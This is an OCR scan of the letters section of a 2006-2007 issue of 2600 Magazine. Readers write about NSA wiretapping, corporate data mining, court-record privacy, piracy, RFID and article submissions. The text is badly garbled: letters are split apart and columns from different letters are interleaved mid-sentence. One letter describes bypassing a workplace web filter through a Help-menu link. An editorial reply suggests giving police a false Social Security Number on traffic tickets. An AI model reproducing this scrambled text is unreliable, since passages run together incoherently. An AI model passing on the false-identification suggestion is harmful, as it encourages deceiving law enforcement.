A wel l -reasoned argument agai nst the NSA wi retap
pi ng woul d be somethi ng i nteresti ng to read. I haven' t
seen anythi ng t hat resembl es a "wel l reasoned" argu
ment from any arti cl e for months now.
comfreak
Believe it or not, this is an issue that affects
everyone, regardless of political affiliation. And the
wiretapping issue is nowhere near as simple as you
make it out to be. We're not about to tell people
to avoid a subject that our particular community
understands better than most insofar as the threats
to privacy and the implications of information gath
ering. "Independent thought " is also critical thought
and never has there been a time where that has been
more in need. As for a " well reasoned" argument, let'
defer to our readers.
Dear 2600:
In 23: 3 page 3 7, R wrote about how i t' s di ffi cul t
Dear 2600: to get fri ends to care about the NSA' s cal l record
I ' ve been an avid reader for several years now database. They gi ve the standard " I ' m not a terrori st :
but some thi ngs in 2600 are starti ng to make me so it won' t hurt me" argument. We know why survei l -
l ose i nterest. For exampl e, every commentary I read l ance l i ke thi s is a bad i dea but someti mes i t can be
contai ns phrases l i ke "George Bush i s spyi ng on us" hel pful to try to put thi ngs i n a way that peopl e l i ke
and " George Bush' s domesti c survei l l ance program. " I that can understand.
am so si ck and ti red of peopl e repeati ng tal ki ng poi nts The NSA' s database i s al l about datami ni ng and
from the Democratic Prty word for word i n thei r fi ndi ng connecti ons where they may not have been
commentari es regardi ng computer securi ty. Can we found in the past. The probl em wi th that is that they' l l
stop acti ng l i ke morons and actual l y exami ne these al so fi nd connections that don' t exi st. R, tel l your
programs without whi ni ng about George Bush? Every fri ends to thi nk about thi s scenari o: you cal l fi ve
ti me I read somethi ng from one of your commen- fri ends, and each of those fi ve fri ends happens to
tators I feel l i ke they haven' t even done a shred of have gotten a cal l from a fri end in a sensi ti ve pol i ti cal
research. They si mpl y copy/paste crap from the regi on. The feds have al ready pi cked your fri ends
medi a concerni ng the NSA. Last ti me I checked thi s up, but they al so deci de to pi ck you up too "j ust i n
magazi ne was about i ndependent thought, not i gno- case. " Before you can say " Surel y there' s been some
rant pol i ti cal rants. I f we want to tal k about nati onal mi stake, " you' re tackl ed i n your own home and l yi ng
securi ty, why doesn' t someone menti on how George on the ground with a boot fi rml y pl anted on the back
Bush hasn' t sealed our borders even after 3,000 of your neck.
peopl e were ki l l ed on 9/1 1 ? Why don ' t we di scuss Of course, bei ng Not A Terrori st, you have nothi ng
real i ssues that matter i nstead of constantl y whi ni ng to worry about. Everythi ng wi l l get strai ghtened out
about the NSA and the "evi l " Bush admi ni strati on? I t ' s and they' l l determi ne t hat you had nothi ng t o do wi th
getti ng redundant and qui te bori ng to read i n every terrori sm and rel ease you. The probl em i s they can' t
i ssue. Can' t we be more i nformed? Don' t we have " unarrest" you. They won ' t tel l your nei ghbors that i t
the I nternet and al ternative forms of medi a to fi nd the was al l a mi stake. They won ' t make that di rty feel i ng
truth and not j ust repeat what peopl e wi th an agenda go away, or the fear.
tel l us? I woul dn' t even mi nd someone compl ai ni ng Maybe to avoi d that ki nd of si tuati on before it
about the NSA if they actual l y took five seconds to get happens, you' l l change your behavi or. You' re not a
thei r facts even remotel y correct. Thi s program I read terrori st, of course, but. . . maybe i t' d be prudent to
about covers peopl e in Ameri ca who make a phone stop tal ki ng to your fri ends i n Baghdad j ust unti l t hi ngs
cal l to al -Qaeda overseas. I t' s that Si mpl e, yet we al l cal m down. Maybe you ' l l start bei ng very careful
P
g
e 34 2600 Ma
g
azine
about who you cal l in case a spuri ous connecti on
to terrori sm i s found. That' s what' s cal l ed a "chi l l i ng
effect" on free speech, and preventi ng that is why the
freedom of speech i s the fi rst amendment.
We 2600 readers know al l thi s and have i t di sti l l ed
down to a few basic axi oms l i ke " survei l l ance i s bad, "
but every once in a whi l e i t can be hel pful to ground
thi ngs i n the concrete.
Lex
We couldn't have said it better. This kind of
thing doesn't just affect those of us who get falsely
accused. We all feel it and that gets manifested in
how we behave: who we talk to, what websites we
go to, ways that we look at the people around us,
etc. It' a sickness that has to be recognized before
we stand any chance of stopping it. We're impressed
with the number of people who get this. We can't
alow ourselves to be discouraged into thinking we're
powerless to change the direction we're heading in.
Nor can we be convinced that this is not something
for us to be talking about. This should be a paramount
issue for freethinking people in any forum.
Dear 2600:
In response to the letter submi tted by the former
NSA empl oyee, from my experi ence not al l of the
"phobi a" expressed by the 2600 soci ety i s "hogwash. "
I n parti cul ar, I woul d be concerned wi th the moni
tori ng of communi cati ons and other acti vi ti es. As
a former empl oyee of a background i nvesti gati on
company cal l ed Choi cePoi nt, I have personal l y
wi tnessed such acti vi ti es. As wel l as other servi ces,
we performed background "checks" for the FBI , CI A,
and NBA ( OK, maybe not the l atter). J ust before I
resi gned, the CEO of Choi cePoi nt approached my
team and i nqui red how di ffi cul t it woul d be to not
onl y moni tor the "acti vi ti es" of someone - let's say an
FBI appl i cant - for t hei r si x mont h probati on peri od,
but to moni tor the peopl e wi th whom they associ
ated. To cl ari fy, he wanted to moni tor the subject ' s
fri ends, fami l y, and acquai ntances. Hi s j usti fi cati on
was " bi rds of a feather fl ock together. " So i f your fri end
i s engaged i n cri mi nal acti vi ti es then you, by associ a
t i on, woul d be fl agged as wel l . I ' l l l et you form your
own opi ni ons regardi ng the moral i ssues i nvol ved,
but apparentl y the l egal i ssues were not a concern
to hi m. Our mi ssi on as devel opers, handed down
di rectl y from hi m: "not to questi on why but j ust to do
or di e. " Hence my departure.
X! U304d
are the reason they monitor downl oads. And you gi ve
a ni ce l i ttl e bl urb - "the movi e sucked. " Wel l , that
j usti fi es your acti ons. The movi e sucked, so breaki ng
the l aw and, more i mportantl y, wi l l ful l y vi ol ati ng the
terms of use - a cl ear cut breach of contract - shoul dn' t
appl y t o you. Gol l y, t he i nj usti ce of i t al l ! Al l i nforma
ti on shoul d be free. Steal i ng creati ve works of art i s
not. You seem to mi ss somethi ng here, so I ' l l repeat
i t: You vol unteered to use the company' s portal to the
I nternet under their terms. Further, " buyi ng" a copy of
a creative body of work i s not ownershi p of the copy
ri ght as you seem to thi nk. It i s buyi ng a l i cense to use
- subj ect to the agreed upon terms. Shari ng i s good,
l i ke you sai d. Shari ng of i nformati on, to be cl ear, i s
great, and I wi l l vehementl y stand up for that. Do not
bel i eve that any I SPs are beni gn in thei r servi ce. They
are j usti fi abl y concerned about bei ng an unknowi ng
partner in onl i ne cri mes. The push behi nd the moni
tori ng i s not moral . I t i s the team of fl esh eati ng barri s
ters they hi re to remai n sol vent and profitabl e.
Steve
Dear 2600:
Thi s is in response to Beowul f' s letter in 23: 3
whi ch was i n regards t o my ori gi nal letter i n 23: 1 .
Fi rst off, the si te that I had found the i nformati on on
the CEH had a pri ci ng of about $1 50 to take the exam.
I rounded up, and I do apol ogi ze. I al so apol ogi ze
for not bei ng cl ear in my letter about my si tuati on. I
am a col l ege student. However, I attend a school that
does not offer campus dorms so I am forced to rent.
I had two jobs at the time because I needed to pay
rent, el ectri c, phone, and al l that fun stuff. I was goi ng
through a rough ti me then.
I was usi ng the CEH as an exampl e of my poi nt
that there are compani es that put thi ngs a l i ttl e too
hi ghl y pri ced for peopl e who are in the same fi nan
ci al si tuati on as me to get started easi l y i n thi s great
i ndustry. But now that I actual l y t hi nk about that state
ment, I suppose i t is the same for any i ndustry. I am
al so l eari ng. I use t he arti cl es from t hi s fi ne publ i
cati on t o expand my knowl edge and understandi ng
of Uni x based operati ng systems. I am i n the process
of teachi ng myself programmi ng so that I may grasp
a better understandi ng of the various l anguages that
are out there. However I have al ways been a fan of
study gu i des.
I see the vari ous certi fi cati on exams as i mportant
bui l di ng bl ocks for my fut ure. To me i t does not matter
if an exam costs $50 or $350. I am spendi ng money
to take these tests and I want to pass. So I read study
Dear 2600:
gui des and I know that i t is not the best way to l earn
Had to wri te regardi ng the di sgruntl ed Cox
new t hi ngs. The best way to l earn i s frm experi ence.
subscri ber ( second l etter i n 23: 3) . Thi s i ndi vi dual
I can onl y ga i n so much from creat i ng my own study
prompt l y sni vel s about hi s pri vacy after steal i ng
l abs. I need experi ence in the fi el d. And to my under-
a movi e onl i ne. Lovel y. What " pri vacy" were you
standi ng, cert i fi cati ons are a huge part of gett i ng i nto
hopi ng for? Wake up, sheep! You vol unteered to use
that fi el d.
a corporati on ' s server ( capi tal i sm r ul es ! ) to access the I have si nce become ful l -ti me at one of the two
net. You vol unteered to abi de by their "terms of use"
jobs I was worki ng at and I qui t the other to gi ve
agreement. You promptl y broke the l aw. Now you' re
mysel f more ti me for other t hi ngs such as my gi rl -
upset because they moni tored your downl oads? You
fri end, fri ends, etc. I t hank you, si r, for your advi ce and
Winter 2006-2007P
g
e 35
ki nd words. It is hard to enj oy l earni ng about how the
government came up wi th l aws to stop monopol i es
back i n the earl y 20th century. But I onl y have four
more months before I graduate wi th my associ ates, so
I am sti cki ng wi th i t. I t ' s n i ce to know that peopl e out
there are concerned about us col l ege ki ds. I appre
ci ate i t and t hank you agai n. I al so say t hank you once
more to the makers of thi s awesome magazi ne. You
guys ser i ousl y rock!
P3ngul n
Dear 2600:
I know t hi s may seem a l i ttl e l ate, but I ' ve been
meani ng to wri te you a l etter and as I was rereadi ng
an ol d i ssue I thought t he quote you opened wi t h i n
i ssue 22: 2 seemed a bi t mi sl eadi ng. Thi s struck me as
odd si nce most of your i ssues open wi th a quotati on
havi ng very much t o do wi th et h i cs. I wonder i f t hat
quote from Orwel l , " Men are onl y as good as thei r
techni cal devel opment al l ows them to be, " mi ght
have been taken out of context i n a way. Di d he not
mean by "good" that they are merel y as techni cal l y
"capabl e and producti ve" as t hei r techni cal devel
opment al l ows? Ei ther way, t hat woul d make much
more sense because techni cal devel opment has not
at al l seemed to i mprove the moral or ethi cal char
acter of manki nd. And that bri ngs me to the crux of
my posi ti on whi ch I have wanted you to respond to
for some ti me. The techni cal capabi l i ti es of hacki ng
computer technol ogy may be amoral l y used for good
or evi l , but the evi l whi ch you seem to often down
pl ay can be of devastati ng power and seems far more
i nsi di ous as l arge bureaucraci es make use of tech
ni cal capabi l i ti es to further thei r agenda. I n regards to
that poi nt about power I ' l l poi nt out that as our l i ves
become more dependent upon computer technol ogy
a s i ngl e person acti ng destructi vel y can cause far
more damage. And the i nformati on, whi ch the hacker
credo suggests shoul d ever be free and avai l abl e to
al l , mi ght bri ng about great devastati on. I can thi nk
of a number of weapons technol ogi es, for i nstance,
whose techni cal schemati cs ought to be hi dden i f not
destroyed. Of course, techni cal capabi l i ty grows and,
sooner or l ater, these devastati ng technol ogi es wi l l
facture of computer rel ated equi pment. And s o t hi s i s
my si ncere and honest cri ti que whi ch I cha l l enge you
to answer. My concl usi on, paradoxi cal l y, i s t hat the
greatest use of computer technol ogy i s agai nst i tsel f,
whi ch I hope thi s message serves to do.
An Unapologetic Neo-luddite
Information will eventualy fall into the wrong
hands. This is as inevitable as the sun rising. And it'
certainly true that we've come to rely on technology
to such a great extent that it' easier than ever to
uncover vast amounts of personal data and create
massive disruptions with the same amount of malice
that a few decades ago would have been sufficient
for a childish prank. While many feel the solution is
to forbid any sort of tampering which could result in
something catastrophic, that doesn't solve the bigger
problem which is the overall insecurity and lack of
forethought in design. We can't blame this on the i
computer technology itself but rather on how we
choose to interrelate with it. If we become enslaved
to a technology, that' a human issue that we need to
address, not a technological one. If "highly destruc
tive information " is stored on computers, that doesn't
make the computer any less neutral. Rather, it speaks
to our motives and failings as humans and that's
where the attention should be focused. Great good
can core from technology as well as great harm. It's
our choice how we use it. Eventually the system will
fail for one reason or another. And we cannot be so
dependent on our technology that we don't have a
plan for when that happens. Weapons technology
is something of a parallel as we see such "advance
ments " now being made in other parts of the world,
something that would have been unthinkable not too
long ago. The fact is that the genie cannot be put back
in the bottle once it' out and eventually someone
you're not comiortable with is going to gain access,
more times than not legitimately. Regardkss of how
you feel about technology pretending it:, not there,
hoping it will go away or forbidding it from being
tested and abused only puts of the inevitable.
Oppression
become practi cal l y commonpl ace and, i nevi tabl y, put
Dear 2600:
to use. Men are i ndeed onl y as good as thei r techni cal Check t hi s out! We got peaceful hi ppi es, ri ght?
abi l ity al l ows them to be. Now I real i ze tbat your staff No weapons whatsoever. And what happens? The
has spent thei r l i ves i mprovi ng and bel i evi ng in the government comes after us wi th M 1 6s ! I am not much
neutral i ty of computer technol ogy, and I don ' t cri ti - of a wri ter, so I ' l l j ust gi ve you t hi s l i nk: http://www.
ci ze that hehavi or si mpl y to be mean, but how neutral "youtube. com/watch?v= 1 hAx5GOI 9mU. The movi e
i s i t when an i ndi vi dual can obtai n hi ghl y destruc- i s pretty much sel f-expl anatory. We need to get the
ti ve i nformati on and corporati ons use the abi l i ty to word out. The more peopl e know what i s happeni ng,
promote the hi ghest l evel of ecol ogi cal consumpti on the better. Thi s fal l s ri ght al ong the l i nes of what 2WO
i n the hi story of ci vi l i zati on? As much as the tech- stands for. Hackers stand for freedom. Everv freedom
nol ogy mi ght hel p one i ndi vi dual find some sort of enumerated in the consti tuti on i ncl udi ng that of
zen happi ness, how many mi l l i ons of others does it the ri ght to assembl e peaceful l y, as is evi denced by
si mpl y compel to shop? Are the benefits brought about HOPE and vari ous peaceful protests carri ed out by
hy eas i l y accessed knowl edge about, say, the envi - i ts members and readers. I mysel f am a reader. Yep,
ronment, offset by the envi ronmental harm caused by that ' s ri ght, a hi ppi e that reads 2600. OK, I ' m gonna
t he consumeri sm enahl ed at t he same t i me? That ' s to stop ri ght there hefore I go off on a l ong rant. Enj oy
say noth i ng of the harm di rectl y caused by the manu- the rampant di spl ay of vi ol ence towards peaceful
Pa
g
e 36 2600 Ma
g
azine
peopl e, and the wonderful way i n whi ch we over
come the vi ol ence!
Kevin
With the exception of the cameraman' mutter
ings, this seems to be a peaceful group confronted
by a bunch of confused and overarmed cops. Fortu
nately this episode ended well. One of the better
things to come out of our surveillance society is the
ability to surveil right back in the faces of those in
power. When the authorities do something out of line,
you can count OH someone in the vicinity to capture
it all and share it with the world. It doesn't change the
fact that we lose more privacy on a daily basis with
all of the cameras, detectors, and computer analysis
targeting us all. But at least we're grabbing a little bit
of that to use for individual rights.
Dear 2600:
Good day al l . I am wri ti ng t hi s l etter in regards
to a tel ecommuni cati ons fi rm whose name wi l l not
be stated. I attempted to pay a bi l l onl i ne whi ch was
successful . I then cal l ed to speak to a " representati ve. "
They were not aware that the payment was made due
to the fact the system had not al erted them. I n order
to restore servi ces they demanded that I gi ve them a
dayt i me tel ephone number where I coul d be reached
to get servi ce agai n. The same person asked me for
t hi s three ti mes despi te bei ng tol d repeatedl y that t hi s
number was unavai l abl e. Then I was transferred to the
bi l l i ng department. The payment was made el ectroni
cal l y, whi ch was unknown t o t he human bei ng on t he
other phone. What i n Ohm' s l aw does my dayt i me
phone number have to do wi th phone servi ce?
I urge al l of your readers to i mpl ement a voi ce over
I nternet sol uti on and an anal og l i ne for conti ngency
purposes. Down with Analog Service Providers! Keep
the Technology Dump the Monopoly!
Serkit
This is a common ploy by many companies, tele
communications and otherwise. When they have you
on the line, they will try almost anything to get more
information out of you. Then they use this for marketing
purposes, whether that means calling you to try and
market some crap or simply selling your information
to some other group of sleazebags. Congratulations
on resisting their datamining attempt.
Dear 2600:
At my work area we use i Mac computers. Whi ch
I di sl i ke. I di s l i ke these computers most l y for the
as. as x does not make me happy. We al so have
to use a password to get past an overl y-oppressi ve
securi ty system. The bl ocker we have i s i ncredi bl y
However, i t was temporary. Eventual l y t he network
admi ns deci ded to make the I nternet Expl orer fol der
admi n onl y and l ock i t off to us mere mortal s. After
about a month of suferi ng under Safari (whi ch seems
to be l oaded wi th bugs as wel l as the bl ocker) we
came upon a fun l i ttl e way around Safari i nto I nternet
Expl orer. I t ' s very si mpl e. Go to any appl i cati on and
cl i ck Hel p. I t ' l l open up a ni ce l i ttl e wi ndow wi th the
as x l ogo on the l eft. Under that wi l l be a l i nk to the
Mac websi te. A si mpl e cl i ck and you' ve got yoursel f
a ni ce I nternet Expl orer wi ndow. Thi s i s a great tri ck
to use i f you ' ve got a nasty bl ocker that onl y works
with Safari , or Safari i s aski ng you for a keychai n pass
word every coupl e of pages. Thanks to the wri ter of
the Wi ndows Medi a Pl ayer wi ndow tri ck for hel pi ng
us get the i dea!
DarkprO
Of course this little trick is very simple to fix or
prevent from happening in the frst place. But you
have the right idea in resisting this level of control.
It's not something specific to the Mac as however.
Blocking software works on nearly all platforms and
the better they get the more frustrating it will become
for those of us who just want to be leli alone.
Dear 2600:
It looks l i keVi sa is taki ng the fi rst steps to demoni ze
the use of money i n thei r current commerci al . They
apparentl y don' t want us buyi ng t hi ngs that can' t be
traced back to who bought i t and when. I f t hi s l i ne of
advert i si ng expands, soon i f you pay cash you wi l l be
l ooked at suspi ci ousl y. I know some work has been
done on t hi s, but someone has to get a form of anony
mous card money out i nto the mai nstream market.
Thanks for a l l the good work that you do.
Barada
People who pay cash are already looked at
with suspicion in many areas. Airports are only one
example of this. The commercial you refer to shows
a busy deli at lunchtime where everyone moves at
an astonishingly efficient pace until some poor guy
tries to pay with cash instead of plastic. The resulting
bedlam ends in the complete breakdown of the
system. What ' most humorous about the whole thing
is that the people running this ad campaign prob
ably never thought anyone would draw inspiration
from the chaos they illustrated. Efciency is all fine
and good but the insane pressure to conform and
the monitoring that goes along with that are not what
healthy individuals crave. We encourage people to
use cash whenever they can, even if it 's only to make
a point.
ti ght. I t wi l l not al l ow any access to forums of any Dear 2600:
sort, anythi ng wi th "profani ti es" (some of the t hi ngs I recentl y started readi ng 2600 and I especi al l y l i ke
consi dered profani ti es were words we were al l owed the art i cl es about pri vacy and el ectroni c securi ty. I t ' s
t o say i n Grade 2), and al l the other stuff bosses don' t a shame t he di recti on t hi s country i s headed towards,
l i ke. Earl y on we found out that the securi ty seemed and unfort unatel y our el ected representati ves have
to work with Safari (aS X' s mai n I nternet browser) so far been total fai l ures at keepi ng up with privacy
but not with I nternet Expl orer. We deci ded not to go i n the i nformati on age. Many of the worst ofenses
i nto detai l with thi s because we enj oyed the freedom. have been perpetrated by those who are supposed
Winter 2006-2007Pge 37
to be worki ng to protect our ri ghts, not vi ol ate them
and put us al l at risk. Many peopl e probabl y know
that you can do background checks on peopl e at pay
websi tes, but now many states are putti ng even the
most tri vi al of offenses - such as traffic ti ckets - onl i ne
for everyone to see. At mdcourts. gov, for exampl e,
you can search by l ast name or l ast and fi rst names
to fi nd cases i ncl udi ng any traffic ti ckets in the enti re
state of Maryl and. The results i ncl ude the defendant ' s
ful l name, ful l address, dr i vi ng l i cense number and
state, month/year of bi rth, hei ght and weight, and
vehi cl e tag number, in addi ti on to the fi ne and di spo
si ti on. I often check thi s on peopl e I date, mai nl y
out of curi osi ty t o see what they' ve done and t o see
what thei r age is. Of course, most peopl e have no
idea how dangerous i t i s to gi ve out your real fi rst and
l ast name, so i t' s easy to l ook them up and certai nl y
more t han hal f of them have had at l east one traffic
ti cket. Vi rgi ni a al so makes thi s data avai l abl e onl i ne
and they gi ve the month/day of bi rth, so if they have
a ti cket there as wel l as in Maryl and, i t' s easy enough
to put together the whol e date of bi rth. Of course,
you can al so j ust drop i nto the l ocal courthouse and
l ook at the actual ci tati on, whi ch they keep on fi l e
forever and i s open to the publ i c. Thi s often contai ns
the Soci al Securi ty Number. As you can see, thi s i s
everythi ng someone needs to commi t i dentity theft or
stal k an ex-l over. Moreover, si nce the i nformati on i s
probabl y avai l abl e i n el ectroni c batch format and sol d
t o make t he states money, i t can be used for targeted
adverti si ng, col l ecti ons, and so on. To be honest, thi s
most tri vi al of i nformati on i s much more than cops i n
most j uri sdi cti ons get whi l e doi ng a traffic stop and
enteri ng your data i nto thei r car computers. I honestl y
see no reason why such detai l ed personal i nformati on
needs to be made avai l abl e by state courts onl i ne.
There's no admi ni strative reason to make i t avai l abl e
and even i f you thi nk traffic ti ckets shoul d be publ i c
there' s no need to i ncl ude addresses and dates of
bi rth. I personal l y thi nk cri mi nal records shoul d be
nonpubl ic except for seri ous offenses where there i s
a publ i c i nterest at stake. To bl i ndl y make every l i ttl e
detai l freel y avai l abl e on the web i s the equi val ent of
putti ng the whol e DMV database onl i ne.
JasonB
We' like to know if anyone has ever been caught
giving a false Social Security Number when getting a
traffic ticket. Obviously if it' already printed on your
license, you would have a tough time puling that
off. Otherwise it seems an almost necessary step to
protect at least one important part of your privacy.
Submission
Dear 2600:
I sent you an arti cl e and wanted to i nqui re
whether you received/looked i nto it. I t's been a whi l e
(6/26/06).
Sandro
you didn't send your article in ASCII text, we suggest
you resend it to meet that standard. In all likelihood
you won't get a second confirmation email. This is
to avoid mail loops and other annoyances. Within a
month or so (sometimes longer if we're swamped),
you'll be notified if we intend to use it in a future issue.
When it does go to print, you will receive a final email
requesting info on where to send your free stuff. If
your article is not accepted, you won't hear anything
after the initial confirmation. Rejection letters result
in people wanting to know exactly why they were
rejected, prolonged discussions, arguments, blood
feuds, etc. If you haven't heard anything for several
months after you send in a submission, then you can
assume it' not what we're looking for. But don't let
that discourage you from submitting something else.
As always, we ask that your submissions not be previ
ously printed or available on the net before they're
printed here. And if you want to send things snail mail.
our address continues to be: 2600 Editorial Dept., PO
Box 99, Middle Island, NY 1 1 953 USA.
Dear 2600:
What about my proposal of arti cl e? I have sent
you thi s proposal some months ago - but I di dn't
receive any repl y. Woul d you l et me know i f you t hi nk
t o use i t ?
Riccardo
We generally don't respond to proposals except
to say that if you think something would make a good
article and you've read our magazine before, then by
all means submit it. It would be unfair of us to tell you
subjects that are off-limits. Anything can appeal to the
hacker mentalty if approached from the right angle.
Simply ask yourself if this is the kind of thing a reader
of ours would appreciate and whether it' different
from what you might find in another magazine. 50
the short answer is: Send it in! Even if it doesn't run
in our pages, you've still created something new and
that opens up all sorts of possibilities.
Dear 2600:
I have wri tten an arti cl e that I am i nterested i n
publ i shi ng anonymousl y. I d o have some concerns
over the protecti on of my i denti ty shoul d the company
I am wri ti ng about demand i t of you. I have been a
reader for about ei ght years now and woul d never
have consi dered wri ti ng the arti cl e to begi n wi th i f I
was not confident that your organi zati on woul d keep
my i denti ty anonymous, but I guess I am j ust l ooki ng
for a l i ttl e reassurance before submi tti ng i t. I have
sought legal advice on the topi c and was tol d that if
the company were to i nvest in i denti fi ng me and if
they were to successful l y i denti fy me they might have
a case for reveal i ng corporate secrets. To be honest,
even as I am wri ti ng thi s I seri ousl y doubt thi s parti c
ul ar company woul d care to i nvest i n fi ndi ng me . . . .
Then agai n . . . .
When you send us an article (at articles@2600. Al so, I know there are no strict gUi del i nes for
-com) you should receive a confirmation email. If
arti cl e submi ssi on as far as l ength, but my arti cl e is a
Pge 38 2600 Magazine
l i ttl e over 2000 words. Is that cool ?
Name Removed
First, we sure hope that wasn't your real name
you used in that letter if you're this worried about
keeping your identity secret. We can keep our mouths
shut but many others can't. In all of the years we've
been publishing, we have never given out the name
of someone who didn't want their identity revealed.
There have been unfortunate instances where infor
mation in the name someone used was enough for
their employer to track them down and take action.
That' why it' so important to not give away details of
your location, name, appearance, or anything which
someone could use the process of elimination in
order to come knocking at your door. We take confi
dentiality very seriously even if other members of the
media don't. But you also have to take precautions
on your end, such as not submitting something under
the same username that people already know you by
, If you wish to remain anonymous, just say so and we
, won't use any name at all to identify you. But even
this may not be enough if you're sending email from
an insecure location, such as your school or work
place. As for length, that' not something to worry
about if your subject matter is interesting, which we
suspect it is.
Question
Dear 2600:
I recentl y purchased the latest i ssue of PC Maga
zine ti tl ed: " How to Hack Everythi ng. " I was very
di sappoi nted, however, when I coul d not find i nfor
mati on therei n on how to hack a Gi bson. I was tol d
that i f I want t o be el i te, I have t o do a ri ghteous hack
on some heavy metal . How can PC Magazine get
away wi th l eavi ng out such val uabl e i nformati on? !
vyxenangel
The only way to get the mass media to print
the specific info you require is to deluge them with
requests and demands for it. Tell them you will fle
them under "garbage" if they don't listen. That usualy
works.
Dear 2600:
I am the l i brari an at DeVry Universi ty i n Ti nl ey
Prk, I l l i noi s. One of my student workers subscri bes
to your magazi ne and he showed me an arti cl e,
" Hope and Fear," that was publ i shed i n 23: 3. I t hi nk i t
i s a wel l reasoned, wel l wri tten arti cl e.
A few years ago some students from DeVry went
to Defeon in las Vegas. I went as an "advi sor" for the
group. I must say that i t was quite the cul ture shock
for me. I presumed the semi nars woul d be al l tech
nol ogy-based programmi ng, ci rcui ts, etc. The di scus
si ons i ncl uded, among other topi cs, free speech,
hang around "peopl e l i ke that. " The "cracker" versus
" hacker" l ecture then fol l ows. I di scovered there i s a
lot more common ground than meets the eye i f onl y
one l ooks for i t .
I teach a course enti tl ed "Cri ti cal Thi nki ng and
Probl em Sol vi ng" ( I cal l i t " Reasoni ng and Research") .
Among the poi nts I try to emphasi ze heavi l y i n the
course are that there are two si des to every i ssue (e. g. ,
use of technol ogy) and you need to take a reasoned
approach to your l i fe.
The " Hope and Fear" arti cl e, I thi nk, expresses
these i deas very wel l . As a resul t, I woul d l i ke the
( unnamed) author ' s permi ssi on to use the arti cl e i n
cl ass.
Pul Burden
Prception is a funny thing. We need to spend
a good deal of time dispelling a lot of myths that
surround the hacker world. Such assumptions prevail
all around us and we need to seek them out and
expose them whenever possible. As for using our
article in your class, you're most welcome to. We only
ask that you let people know where it' from.
Dear 2600:
In the Wi nter or Spri ng 2006 i ssue you pri nted an
arti cl e or letter that menti oned probabi l i ty formul as
to reduce l east l i kel y numbers from lotto sel ecti ons.
Someone stol e my i ssue.
I woul d l i ke to try i mpl ementi ng the formul a i n
other areas. The arti cl e menti oned the formul a was
advertised in the cl assi fieds of a major magazi ne, but
di d not say whi ch.
Woul d you tel l me the author of the arti cl e i n your
magazi ne or ask hi m/her what magazi ne and i ssue
di d the ad appear i n?
Greg
The article appeared in the Winter 2005-2006
issue. We're not sure that it wuld do you much good
to know which specific tabloid the " Lottery Secret
Revealed" information was advertised in, especially
since the story took place 12 years ago. If we receive
more specific info, we will share it. Otherwise you
should be able to fnd all sort of information (good
and bad) by simply searching the net.
Dear 2600:
Do you guys pri nt any 2600 stickers? It woul d be
ni ce to be abl e to sl ap the name across my l aptop to
make my i nterests cl ear.
I dgeitman
We had stickers for HOPE Number Six which were
given out at the door and we have leftovers which
we're sending to anyone who orders HOPE shirt off
our website. A generic 2600 sticker is something we'
like to consider.
i ntel l ectual freedom, and i ntel l ectual property. I Dear 2600:
must say I was very surpri sed. Many of the i ssues I ' ve been readi ng your great magazi ne for about
di scussed were i ssues that I deal wi th as a l i brari an. 1 1 years now. After so many years and sti l l seei ng your
When I tol d peopl e that Defeon i s a hacker' s confer- ads for orderi ng back i ssues i t has got me wonderi ng.
ence they al ways wanted to know why I wanted to How is i t that after 22 years you sti l l have back i ssues
Winter 2006-2007Pge 39
for every magazi ne pri nted? Where do you store them
and how much space do they take up? What do you
do to protect them from damage? How many copi es
do you have of the 1 984 i ssues?
El nstein
We believe it' very important to keep things from
going out of print which is why we occasionally have
to reprint some of the realy old issues. The not-sa-old
ones have enough extras to last a very long time. But if
those should run out and people stil want them, we'll
reprint those issues as well. We keep them in a safe,
dry place with lots of room. And we have lots of 1 984
issues since those were just unbound sheets of paper.
We only printed a few dozen that first year and we've
had to reprint them many, many times since.
Dear 2600:
So I ' m j ust taki ng a shot in the dark here but are
you guys named after the bl ue box and its 2600 hertz
sound waves?
Clark Mi l hol land
You need to shoot in the dark more often. That's
precisely it. To us, 2600 hertz represented the seizing
of technology for individual use and abuse. The rest
is history
Dear 2600:
I am an i ndependent sofware consul tant based i n
I ndi a. I want t o repri nt 2600: The Hacker Quarterly
and di stri bute i t here in I ndi a and woul d l i ke to know
what the opti ons are. The average IT magazi ne here i s
sol d for one or t wo dol l ars.
Raj
We are not opposed to such a venture but it
would take a lot of coordination as there would be
virtually no way for us to do any of the work in the
States without losing a ton of money You're welcome
to write to us with more specifics and the like.
Dear 2600:
I heard through the rumor mi l l that passport covers
to bl ock RFI D si gnal s were handed out at HOPE to
parti ci pants. Do these passport covers exi st? Where
cou Id I get one?
Squealing Sheep
One of our vendors (DIFRwear) was in fact a
seller of such RF I D blocking passport covers as well
as RFID blocking wallets. You can visit their site at
http://wwwdifrwear. com.
Dear 2600:
I have a fourth generation i Pod. My battery was
r unni ng l ow and I pressed a random sequence of keys
on the cl i ck wheel . A menu came up in standard text.
The menu had the fol l owi ng choi ces: "batt a2d, a3d
5tat, firewire, hdd r/w, 5mart dat, hdd 5can, read 5n,
di5kmode, wheel, contrast, audio, status, drv temp,
iram test, 5 in 1, reset, key chgr curr, remote, hp
status, 5leep. "
I was goi ng through the menus and then my
battery di ed. Has anyone ever seen thi s before? And
what does the menu do?
Oral Seymour
Dear 2600:
I am a huge fan and I was wonderi ng i f you coul d
tel l me about a websi te that coul d give me good free
musi c wi thout usi ng Li mewi re or Kazaa.
Pc.Man
The best method of sharing music is through
a group known as Friends. They are quite open to
passing around any music that you may find inter
esting and it's a remarkably easy group to join. What '
more, they've been doing this for as long as recorded i
music has existed.
Dear 2600:
May I have some shout outs in the next i ssue?
DoofMasterZ, tOmtwi nki e, j oel , wi teboyshuffl e, cry.
sys, and d/\ n. Thank you.
Samuel Reed
Did you grow up in a barn? Shout outs are not
something you can just write in and request. They
must be eared. So the answer is no, you may not
have the shout outs listed above. Respect.
Prosecution
Dear 2600:
I was wonderi ng i f you coul d possi bl y gi ve me
some advi ce. Last December I received a l etter i n
t he mai l from t he RI AA aski ng for a settl ement of
$4, 225 . 00 for i l l egal downl oadi ng found on my I P
address. I then got an attorney and hoped for the
best. They are now demandi ng the settl ement or they
i ntend to fi l e sui t agai nst me. I s there any way to get
out of thi s? I f you have any advi ce or i nformati on that
woul d hel p me out pl ease wri te back very soon.
Kristin
It depends on what you want to get out of this.
If you want to fight them, then you should. It's very
rare for these entities to insist on a settlement if they
think they just detected a violation for the first time.
It' likely just a scare tactic since taking you to court
is expensive and risky for them as well. Regardless,
their accusing you isn't enough on it5 own. It' rela
tively easy to hop onto an IP via a WiFi link or even by
5poofing the addre5s. The burden of proof i5 on them
to prove that it was actually you who did this. Your
attorney really should have told you al this.
Dear 2600:
